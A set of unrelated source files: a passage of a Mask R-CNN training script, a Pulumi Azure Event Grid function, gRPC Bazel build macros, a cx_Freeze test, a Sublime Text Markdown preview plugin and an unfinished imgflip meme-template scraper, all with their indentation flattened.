fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits, gt_boxes,
tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
# In training, mask branch shares the same C5 feature.
fg_feature = tf.gather(feature_fastrcnn, proposals.fg_inds())
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', fg_feature, cfg.DATA.NUM_CATEGORY, num_convs=0) # #fg x #cat x 14x14
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 14,
pad_border=False) # nfg x 1x14x14
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
roi_resized = roi_align(featuremap, final_boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE), 14)
feature_maskrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1])
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', feature_maskrcnn, cfg.DATA.NUM_CATEGORY, 0) # #result x #cat x 14x14
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx14x14
tf.sigmoid(final_mask_logits, name='output/masks')
return []
class ResNetFPNModel(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image')]
num_anchors = len(cfg.RPN.ANCHOR_RATIOS)
for k in range(len(cfg.FPN.ANCHOR_STRIDES)):
ret.extend([
tf.TensorSpec((None, None, num_anchors), tf.int32,
'anchor_labels_lvl{}'.format(k + 2)),
tf.TensorSpec((None, None, num_anchors, 4), tf.float32,
'anchor_boxes_lvl{}'.format(k + 2))])
ret.extend([
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')]) # all > 0
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
) # NR_GT x height x width
return ret
def slice_feature_and_anchors(self, p23456, anchors):
for i, stride in enumerate(cfg.FPN.ANCHOR_STRIDES):
with tf.name_scope('FPN_slice_lvl{}'.format(i)):
anchors[i] = anchors[i].narrow_to(p23456[i])
def backbone(self, image):
c2345 = resnet_fpn_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS)
p23456 = fpn_model('fpn', c2345)
return p23456
def rpn(self, image, features, inputs):
assert len(cfg.RPN.ANCHOR_SIZES) == len(cfg.FPN.ANCHOR_STRIDES)
image_shape2d = tf.shape(image)[2:] # h,w
all_anchors_fpn = get_all_anchors_fpn()
multilevel_anchors = [RPNAnchors(
all_anchors_fpn[i],
inputs['anchor_labels_lvl{}'.format(i + 2)],
inputs['anchor_boxes_lvl{}'.format(i + 2)]) for i in range(len(all_anchors_fpn))]
self.slice_feature_and_anchors(features, multilevel_anchors)
# Multi-Level RPN Proposals
rpn_outputs = [rpn_head('rpn', pi, cfg.FPN.NUM_CHANNEL, len(cfg.RPN.ANCHOR_RATIOS))
for pi in features]
multilevel_label_logits = [k[0] for k in rpn_outputs]
multilevel_box_logits = [k[1] for k in rpn_outputs]
multilevel_pred_boxes = [anchor.decode_logits(logits)
for anchor, logits in zip(multilevel_anchors, multilevel_box_logits)]
proposal_boxes, proposal_scores = generate_fpn_proposals(
multilevel_pred_boxes, multilevel_label_logits, image_shape2d)
if self.training:
losses = multilevel_rpn_losses(
multilevel_anchors, multilevel_label_logits, multilevel_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
assert len(features) == 5, "Features have to be P23456!"
gt_boxes, gt_labels, *_ = targets
if self.training:
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
fastrcnn_head_func = getattr(model_frcnn, cfg.FPN.FRCNN_HEAD_FUNC)
if not cfg.FPN.CASCADE:
roi_feature_fastrcnn = multilevel_roi_align(features[:4], proposals.boxes, 7)
head_feature = fastrcnn_head_func('fastrcnn', roi_feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(
'fastrcnn/outputs', head_feature, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
else:
def roi_func(boxes):
return multilevel_roi_align(features[:4], boxes, 7)
fastrcnn_head = CascadeRCNNHead(
proposals, roi_func, fastrcnn_head_func,
(gt_boxes, gt_labels), image_shape2d, cfg.DATA.NUM_CLASS)
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
roi_feature_maskrcnn = multilevel_roi_align(
features[:4], proposals.fg_boxes(), 14,
name_scope='multilevel_roi_align_mask')
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 28,
pad_border=False) # fg x 1x28x28
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
# Cascade inference needs roi transform with refined boxes.
roi_feature_maskrcnn = multilevel_roi_align(features[:4], final_boxes, 14)
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx28x28
tf.sigmoid(final_mask_logits, name='output/masks')
return []
def do_visualize(model, model_path, nr_visualize=100, output_dir='output'):
"""
Visualize some intermediate results (proposals, raw predictions) inside the pipeline.
"""
df = get_train_dataflow() # we don't visualize mask stuff
df.reset_state()
pred = OfflinePredictor(PredictConfig(
model=model,
session_init=get_model_loader(model_path),
input_names=['image', 'gt_boxes', 'gt_labels'],
output_names=[
'generate_{}_proposals/boxes'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'generate_{}_proposals/scores'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'fastrcnn_all_scores',
'output/boxes',
'output/scores',
'output/labels',
]))
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
utils.fs.mkdir_p(output_dir)
with tqdm.tqdm(total=nr_visualize) as pbar:
for idx, dp in itertools.islice(enumerate(df), nr_visualize):
img, gt_boxes, gt_labels = dp['image'], dp['gt_boxes'], dp['gt_labels']
rpn_boxes, rpn_scores, all_scores, \
final_boxes, final_scores, final_labels = pred(img, gt_boxes, gt_labels)
# draw groundtruth boxes
gt_viz = draw_annotation(img, gt_boxes, gt_labels)
# draw best proposals for each groundtruth, to show recall
proposal_viz, good_proposals_ind = draw_proposal_recall(img, rpn_boxes, rpn_scores, gt_boxes)
# draw the scores for the above proposals
score_viz = draw_predictions(img, rpn_boxes[good_proposals_ind], all_scores[good_proposals_ind])
results = [DetectionResult(*args) for args in
zip(final_boxes, final_scores, final_labels,
[None] * len(final_labels))]
final_viz = draw_final_outputs(img, results)
viz = tpviz.stack_patches([
gt_viz, proposal_viz,
score_viz, final_viz], 2, 2)
if os.environ.get('DISPLAY', None):
tpviz.interactive_imshow(viz)
cv2.imwrite("{}/{:03d}.png".format(output_dir, idx), viz)
pbar.update()
def do_evaluate(pred_config, output_file):
num_gpu = cfg.TRAIN.NUM_GPUS
graph_funcs = MultiTowerOfflinePredictor(
pred_config, list(range(num_gpu))).get_predictors()
for dataset in cfg.DATA.VAL:
logger.info("Evaluating {} ...".format(dataset))
dataflows = [
get_eval_dataflow(dataset, shard=k, num_shards=num_gpu)
for k in range(num_gpu)]
all_results = multithread_predict_dataflow(dataflows, graph_funcs)
output = output_file + '-' + dataset
DetectionDataset().eval_or_save_inference_results(all_results, dataset, output)
def do_predict(pred_func, input_file):
img = cv2.imread(input_file, cv2.IMREAD_COLOR)
results = predict_image(img, pred_func)
final = draw_final_outputs(img, results)
viz = np.concatenate((img, final), axis=1)
cv2.imwrite("output.png", viz)
logger.info("Inference output for {} written to output.png".format(input_file))
tpviz.interactive_imshow(viz)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--load', help='load a model for evaluation or training. Can overwrite BACKBONE.WEIGHTS')
parser.add_argument('--logdir', help='log directory', default='train_log/maskrcnn')
parser.add_argument('--visualize', action='store_true', help='visualize intermediate results')
parser.add_argument('--evaluate', help="Run evaluation. "
"This argument is the path to the output json evaluation file")
parser.add_argument('--predict', help="Run prediction on a given image. "
"This argument is the path to the input image file", nargs='+')
parser.add_argument('--config', help="A list of KEY=VALUE to overwrite those defined in config.py",
nargs='+')
if get_tf_version_tuple() < (1, 6):
# https://github.com/tensorflow/tensorflow/issues/14657
logger.warn("TF<1.6 has a bug which may lead to crash in FasterRCNN if you're unlucky.")
args = parser.parse_args()
if args.config:
cfg.update_args(args.config)
MODEL = ResNetFPNModel() if cfg.MODE_FPN else ResNetC4Model()
DetectionDataset() # initialize the config with information from our dataset
if args.visualize or args.evaluate or args.predict:
if not tf.test.is_gpu_available():
from tensorflow.python.framework import test_util
assert get_tf_version_tuple() >= (1, 7) and test_util.IsMklEnabled(), \
"Inference requires either GPU support or MKL support!"
assert args.load
finalize_configs(is_training=False)
if args.predict or args.visualize:
cfg.TEST.RESULT_SCORE_THRESH = cfg.TEST.RESULT_SCORE_THRESH_VIS
if args.visualize:
do_visualize(MODEL, args.load)
else:
predcfg = PredictConfig(
model=MODEL,
session_init=get_model_loader(args.load),
input_names=MODEL.get_inference_tensor_names()[0],
output_names=MODEL.get_inference_tensor_names()[1])
if args.predict:
predictor = OfflinePredictor(predcfg)
for image_file in args.predict:
do_predict(predictor, image_file)
elif args.evaluate:
assert args.evaluate.endswith('.json'), args.evaluate
do_evaluate(predcfg, args.evaluate)
else:
is_horovod = cfg.TRAINER == 'horovod'
if is_horovod:
hvd.init()
logger.info("Horovod Rank={}, Size={}".format(hvd.rank(), hvd.size()))
if not is_horovod or hvd.rank() == 0:
logger.set_logger_dir(args.logdir, 'd')
logger.info("Environment Information:\n" + collect_env_info())
finalize_configs(is_training=True)
stepnum = cfg.TRAIN.STEPS_PER_EPOCH
# warmup is step based, lr is epoch based
init_lr = cfg.TRAIN.WARMUP_INIT_LR * min(8. / cfg.TRAIN.NUM_GPUS, 1.)
warmup_schedule = [(0, init_lr), (cfg.TRAIN.WARMUP, cfg.TRAIN.BASE_LR)]
warmup_end_epoch = cfg.TRAIN.WARMUP * 1. / stepnum
lr_schedule = [(int(warmup_end_epoch + 0.5), cfg.TRAIN.BASE_LR)]
factor = 8. / cfg.TRAIN.NUM_GPUS
for idx, steps in enumerate(cfg.TRAIN.LR_SCHEDULE[:-1]):
mult = 0.1 ** (idx + 1)
lr_schedule.append(
(steps * factor // stepnum, cfg.TRAIN.BASE_LR * mult))
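# A purely illustrative example of the scaling above (numbers are hypothetical,
# not taken from config.py): with NUM_GPUS=8 (factor=1.0), BASE_LR=0.01,
# STEPS_PER_EPOCH=500, WARMUP=1000 and LR_SCHEDULE=[120000, 160000, 180000],
# lr_schedule becomes [(2, 0.01), (240, 0.001), (320, 0.0001)]:
# step counts are rescaled by factor and converted to 500-step "epochs".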
logger.info("Warm Up Schedule (steps, value): " + str(warmup_schedule))
logger.info("LR Schedule (epochs, value): " + str(lr_schedule))
train_dataflow = get_train_dataflow()
# This is what's commonly referred to as "epochs"
total_passes = cfg.TRAIN.LR_SCHEDULE[-1] * 8 / train_dataflow.size()
logger.info("Total passes of the training set is: {:.5g}".format(total_passes))
callbacks = [
PeriodicCallback(
ModelSaver(max_to_keep=10, keep_checkpoint_every_n_hours=1),
every_k_epochs=20),
# linear warmup
ScheduledHyperParamSetter(
'learning_rate', warmup_schedule, interp='linear', step_based=True),
ScheduledHyperParamSetter('learning_rate', lr_schedule),
PeakMemoryTracker(),
EstimatedTimeLeft(median=True),
SessionRunTimeout(60000).set_chief_only(True), # 1 minute timeout
]
if cfg.TRAIN.EVAL_PERIOD > 0:
callbacks.extend([
EvalCallback(dataset, *MODEL.get_inference_tensor_names(), args.logdir)
for dataset in cfg.DATA.VAL
])
if not is_horovod:
callbacks.append(GPUUtilizationTracker())
if is_horovod and hvd.rank() > 0:
session_init = None
else:
if args.load:
session_init = get_model_loader(args.load)
else:
session_init = get_model_loader(cfg.BACKBONE.WEIGHTS) if cfg.BACKBONE.WEIGHTS else None
traincfg = TrainConfig(
model=MODEL,
data=QueueInput(train_dataflow),
callbacks=callbacks,
steps_per_epoch=stepnum,
max_epoch=cfg.TRAIN.LR_SCHEDULE[-1] * factor // stepnum,
session_init=session_init,
starting_epoch=cfg.TRAIN.STARTING_EPOCH
)
if is_horovod:
trainer = HorovodTrainer(average=False)
else:
# nccl mode appears faster than cpu mode
trainer = SyncMultiGPUTrainerReplicated(cfg.TRAIN.NUM_GPUS, average=False, mode='nccl')
launch_train_with_config(traincfg, trainer)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetDomainTopicResult',
'AwaitableGetDomainTopicResult',
'get_domain_topic',
]
warnings.warn("""The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.""", DeprecationWarning)
@pulumi.output_type
class GetDomainTopicResult:
"""
Domain Topic.
"""
def __init__(__self__, id=None, name=None, provisioning_state=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified identifier of the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> Optional[str]:
"""
Provisioning state of the domain topic.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> str:
"""
Type of the resource.
"""
return pulumi.get(self, "type")
class AwaitableGetDomainTopicResult(GetDomainTopicResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDomainTopicResult(
id=self.id,
name=self.name,
provisioning_state=self.provisioning_state,
type=self.type)
def get_domain_topic(domain_name: Optional[str] = None,
domain_topic_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDomainTopicResult:
"""
Domain Topic.
Latest API Version: 2020-06-01.
:param str domain_name: Name of the domain.
:param str domain_topic_name: Name of the topic.
:param str resource_group_name: The name of the resource group within the user's subscription.
"""
pulumi.log.warn("get_domain_topic is deprecated: The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.")
__args__ = dict()
__args__['domainName'] = domain_name
__args__['domainTopicName'] = domain_topic_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:eventgrid/latest:getDomainTopic', __args__, opts=opts, typ=GetDomainTopicResult).value
return AwaitableGetDomainTopicResult(
id=__ret__.id,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
type=__ret__.type)
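# Example invocation (all resource names below are hypothetical):
#   result = get_domain_topic(domain_name="example-domain",
#                             domain_topic_name="example-topic",
#                             resource_group_name="example-rg")
#   pulumi.export("provisioningState", result.provisioning_state)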
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is for the gRPC build system. This isn't intended to be used outside of
# the BUILD file for gRPC. It contains the mapping for the template system we
# use to generate other platforms' build system files.
#
# Please consider that there should be a high bar for additions and changes to
# this file.
# Each rule listed must be re-written for Google's internal build system, and
# each change must be ported from one to the other.
#
load("//bazel:cc_grpc_library.bzl", "cc_grpc_library")
load("@upb//bazel:upb_proto_library.bzl", "upb_proto_library")
load("@build_bazel_rules_apple//apple:ios.bzl", "ios_unit_test")
# The set of pollers to test against if a test exercises polling
POLLERS = ["epollex", "epoll1", "poll"]
def if_not_windows(a):
return select({
"//:windows": [],
"//:windows_msvc": [],
"//conditions:default": a,
})
def if_mac(a):
return select({
"//:mac_x86_64": a,
"//conditions:default": [],
})
def _get_external_deps(external_deps):
ret = []
for dep in external_deps:
if dep == "address_sorting":
ret += ["//third_party/address_sorting"]
elif dep == "cares":
ret += select({
"//:grpc_no_ares": [],
"//conditions:default": ["//external:cares"],
})
elif dep == "cronet_c_for_grpc":
ret += ["//third_party/objective_c/Cronet:cronet_c_for_grpc"]
elif dep.startswith("absl/"):
ret += ["@com_google_absl//" + dep]
else:
ret += ["//external:" + dep]
return ret
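# Illustration of the mapping above (deps chosen for example only):
#   _get_external_deps(["cares", "absl/strings", "zlib"])
# returns a select() that resolves c-ares (empty when //:grpc_no_ares is set),
# plus ["@com_google_absl//absl/strings", "//external:zlib"].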
def grpc_cc_library(
name,
srcs = [],
public_hdrs = [],
hdrs = [],
external_deps = [],
deps = [],
standalone = False,
language = "C++",
testonly = False,
visibility = None,
alwayslink = 0,
data = [],
use_cfstream = False,
tags = []):
copts = []
if use_cfstream:
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
linkopts = if_not_windows(["-pthread"])
if use_cfstream:
linkopts = linkopts + if_mac(["-framework CoreFoundation"])
native.cc_library(
name = name,
srcs = srcs,
defines = select({
"//:grpc_no_ares": ["GRPC_ARES=0"],
"//conditions:default": [],
}) +
select({
"//:remote_execution": ["GRPC_PORT_ISOLATED_RUNTIME=1"],
"//conditions:default": [],
}) +
select({
"//:grpc_allow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=1"],
"//:grpc_disallow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=0"],
"//conditions:default": [],
}) +
if_mac(["INSTALL_PREFIX=/usr/local"]),
hdrs = hdrs + public_hdrs,
deps = deps + _get_external_deps(external_deps),
copts = copts,
visibility = visibility,
testonly = testonly,
linkopts = linkopts,
includes = [
"include",
"src/core/ext/upb-generated", # Once upb code-gen issue is resolved, remove this.
],
alwayslink = alwayslink,
data = data,
tags = tags,
)
def grpc_proto_plugin(name, srcs = [], deps = []):
native.cc_binary(
name = name,
srcs = srcs,
deps = deps,
)
def grpc_proto_library(
name,
srcs = [],
deps = [],
well_known_protos = False,
has_services = True,
use_external = False,
generate_mocks = False):
cc_grpc_library(
name = name,
srcs = srcs,
deps = deps,
well_known_protos = well_known_protos,
proto_only = not has_services,
use_external = use_external,
generate_mocks = generate_mocks,
)
def ios_cc_test(
name,
tags = [],
**kwargs):
ios_test_adapter = "//third_party/objective_c/google_toolbox_for_mac:GTM_GoogleTestRunner_GTM_USING_XCTEST"
test_lib_ios = name + "_test_lib_ios"
ios_tags = tags + ["manual", "ios_cc_test"]
if not any([t for t in tags if t.startswith("no_test_ios")]):
native.objc_library(
name = test_lib_ios,
srcs = kwargs.get("srcs"),
deps = kwargs.get("deps"),
copts = kwargs.get("copts"),
tags = ios_tags,
alwayslink = 1,
testonly = 1,
)
ios_test_deps = [ios_test_adapter, ":" + test_lib_ios]
ios_unit_test(
name = name + "_on_ios",
size = kwargs.get("size"),
tags = ios_tags,
minimum_os_version = "9.0",
deps = ios_test_deps,
)
def grpc_cc_test(name, srcs = [], deps = [], external_deps = [], args = [], data = [], uses_polling = True, language = "C++", size = "medium", timeout = None, tags = [], exec_compatible_with = [], exec_properties = {}, shard_count = None, flaky = None):
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
# NOTE: these attributes are not automatically applied to the poller-specific
# versions of a test; set them explicitly where applicable.
args = {
"srcs": srcs,
"args": args,
"data": data,
"deps": deps + _get_external_deps(external_deps),
"copts": copts,
"linkopts": if_not_windows(["-pthread"]),
"size": size,
"timeout": timeout,
"exec_compatible_with": exec_compatible_with,
"exec_properties": exec_properties,
"shard_count": shard_count,
"flaky": flaky,
}
if uses_polling:
# the vanilla version of the test should run on platforms that only
# support a single poller
native.cc_test(
name = name,
testonly = True,
tags = (tags + [
"no_linux", # linux supports multiple pollers
]),
**args
)
# on linux we run the same test multiple times, once for each poller
for poller in POLLERS:
native.sh_test(
name = name + "@poller=" + poller,
data = [name] + data,
srcs = [
"//test/core/util:run_with_poller_sh",
],
size = size,
timeout = timeout,
args = [
poller,
"$(location %s)" % name,
] + args["args"],
tags = (tags + ["no_windows", "no_mac"]),
exec_compatible_with = exec_compatible_with,
exec_properties = exec_properties,
shard_count = shard_count,
flaky = flaky,
)
else:
# the test behavior doesn't depend on polling, just generate the test
native.cc_test(name = name, tags = tags + ["no_uses_polling"], **args)
ios_cc_test(
name = name,
tags = tags,
**args
)
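# Illustration (test name is hypothetical): grpc_cc_test(name = "foo_test", uses_polling = True)
# produces cc_test ":foo_test" (tagged "no_linux") plus one sh_test per poller,
# ":foo_test@poller=epollex", ":foo_test@poller=epoll1" and ":foo_test@poller=poll",
# each wrapping the test binary via //test/core/util:run_with_poller_sh.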
def grpc_cc_binary(name, srcs = [], deps = [], external_deps = [], args = [], data = [], language = "C++", testonly = False, linkshared = False, linkopts = [], tags = []):
copts = []
if language.upper() == "C":
copts = ["-std=c99"]
native.cc_binary(
name = name,
srcs = srcs,
args = args,
data = data,
testonly = testonly,
linkshared = linkshared,
deps = deps + _get_external_deps(external_deps),
copts = copts,
linkopts = if_not_windows(["-pthread"]) + linkopts,
tags = tags,
)
def grpc_generate_one_off_targets():
# In open-source, grpc_objc* libraries depend directly on //:grpc
native.alias(
name = "grpc_objc",
actual = "//:grpc",
)
def grpc_generate_objc_one_off_targets():
pass
def grpc_sh_test(name, srcs, args = [], data = []):
native.sh_test(
name = name,
srcs = srcs,
args = args,
data = data,
)
def grpc_sh_binary(name, srcs, data = []):
native.sh_binary(
name = name,
srcs = srcs,
data = data,
)
def grpc_py_binary(
name,
srcs,
data = [],
deps = [],
external_deps = [],
testonly = False,
python_version = "PY2",
**kwargs):
native.py_binary(
name = name,
srcs = srcs,
testonly = testonly,
data = data,
deps = deps + _get_external_deps(external_deps),
python_version = python_version,
**kwargs
)
def grpc_package(name, visibility = "private", features = []):
if visibility == "tests":
visibility = ["//test:__subpackages__"]
elif visibility == "public":
visibility = ["//visibility:public"]
elif visibility == "private":
visibility = []
else:
fail("Unknown visibility " + visibility)
if len(visibility) != 0:
native.package(
default_visibility = visibility,
features = features,
)
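# Illustrative usage (package name is hypothetical):
#   grpc_package(name = "core", visibility = "public")
# expands to native.package(default_visibility = ["//visibility:public"]).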
def grpc_objc_library(
name,
srcs = [],
hdrs = [],
textual_hdrs = [],
data = [],
deps = [],
defines = [],
includes = [],
visibility = ["//visibility:public"]):
"""The grpc version of objc_library, only used for the Objective-C library compilation
Args:
name: name of target
hdrs: public headers
srcs: all source files (.m)
textual_hdrs: private headers
data: any other bundle resources
defines: preprocessors
includes: added to search path, always [the path to objc directory]
deps: dependencies
visibility: visibility, default to public
"""
native.objc_library(
name = name,
hdrs = hdrs,
srcs = srcs,
textual_hdrs = textual_hdrs,
data = data,
deps = deps,
defines = defines,
includes = includes,
visibility = visibility,
)
def grpc_upb_proto_library(name, deps):
upb_proto_library(name = name, deps = deps)
def python_config_settings():
native.config_setting(
name = "python3",
flag_values = {"@bazel_tools//tools/python:python_version": "PY3"},
)
|
import os.path
import sys
from nose.tools import assert_raises
from cx_Freeze.common import ConfigError, process_path_specs
rootdir = "C:\\" if sys.platform == "win32" else "/"
def test_process_path_specs():
inp = [
os.path.join(rootdir, "foo", "bar"),
(os.path.join(rootdir, "foo", "qux"), os.path.join("baz", "xyz")),
]
outp = process_path_specs(inp)
assert outp == [
(os.path.join(rootdir, "foo", "bar"), "bar"),
(os.path.join(rootdir, "foo", "qux"), os.path.join("baz", "xyz")),
]
def test_process_path_specs_bad():
with assert_raises(ConfigError):
process_path_specs(
[(os.path.join(rootdir, "foo"), os.path.join(rootdir, "bar"))]
)
with assert_raises(ConfigError):
process_path_specs([("a", "b", "c")])
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import webbrowser
import sublime
import sublime_plugin
from . import MDETextCommand
from . import plugin_name
from . import settings
from python_utils.misc_utils import get_system_tempdir
from python_utils.mistune_utils import md
from python_utils.sublime_text_utils.utils import get_file_path
from python_utils.sublime_text_utils.utils import get_view_context
from python_utils.sublime_text_utils.utils import substitute_variables
__all__ = [
"MdeMarkdownPreviewCommand",
"MdeMarkdownPreviewListener"
]
_html_template = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes" />
<title>Markdown Editing Fork - Preview</title>
{stylesheets}
</head>
<body>
<div class="content boxed">
{content}
</div>
</body>
</html>
"""
_stylesheet_link_template = '<link rel="stylesheet" href="{href}" />'
class StorageClass():
def __init__(self):
self.open_previews = {}
Storage = StorageClass()
class MdeMarkdownPreviewCommand(MDETextCommand):
def run(self, edit):
file_path = get_file_path(self.view)
text = self.view.substr(sublime.Region(0, self.view.size()))
if not text or not file_path:
sublime.status_message("No content to preview")
return
html_file_id = "%d-%d" % (self.view.window().id(), self.view.id())
html_file_path = os.path.join(get_system_tempdir(), plugin_name, html_file_id + ".html")
os.makedirs(os.path.dirname(html_file_path), exist_ok=True)
with open(html_file_path, "w", encoding="UTF-8") as temp_file:
temp_file.write(_html_template.format(
stylesheets=self._ody_get_stylesheets(),
content=md(text))
)
if html_file_id not in Storage.open_previews:
# Register the preview under its id (assigning the id directly would clobber the dict).
Storage.open_previews[html_file_id] = html_file_path
webbrowser.open(html_file_path, new=2, autoraise=True)
else:
sublime.status_message("Reload web page")
def _ody_get_stylesheets(self):
stylesheets = substitute_variables(get_view_context(
self.view), settings.get("preview_stylesheets"))
return "\n".join([_stylesheet_link_template.format(href=s)
for s in stylesheets]) if stylesheets else ""
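# For example, with the "preview_stylesheets" setting set to
# ["file:///path/to/style.css"] (a hypothetical value), this returns
# '<link rel="stylesheet" href="file:///path/to/style.css" />'.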
class MdeMarkdownPreviewListener(sublime_plugin.EventListener):
def on_close(self, view):
if view and view.id() and view.window() and view.window().id():
html_file_id = "%d-%d" % (view.window().id(), view.id())
if html_file_id in Storage.open_previews:
del Storage.open_previews[html_file_id]
if __name__ == "__main__":
pass
|
import json
import time
import os
import pandas as pd
import requests
from bs4 import BeautifulSoup
from tqdm import tqdm
def process_9gag(args):
fetched_memes = []
errors = 0
# for i in tqdm(range(args.))
pass
def process_me_dot_me(args):
pass
def templates_imgflip(args):
args.source_url = "https://imgflip.com/memetemplates"
fetched_templates = []
errors = 0
for i in tqdm(range(args.from_page, args.pages + 1)):
print(f"Requesting: {args.source_url}?page={i}")
response = requests.get(f"{args.source_url}?page={i}")
print(response)
if response.status_code != 200:
print("Bad response")
break
body = BeautifulSoup(response.text, 'html.parser')
templates = body.findAll("div", {"class": "mt-box"})
print(len(templates))
for template in templates:
try:
template_url = "https://"+template.find('img', {"class": "shadow"})['src'][2:]
template_id, template_format = os.path.splitext(template_url.split("/")[-1])
template_title = template.find("h3", {"class": "mt-title"}).find("a")
template_title = "" if template_title is None else template_title.text
template_data = {
"id": template_id,
"format": template_format,
"website": "imgflip",
"url": template_url,
"title": template_title
}
fetched_templates.append(template_data)
except Exception:
# Count and skip templates that are missing expected elements.
errors += 1
# time.sleep(args.delay)
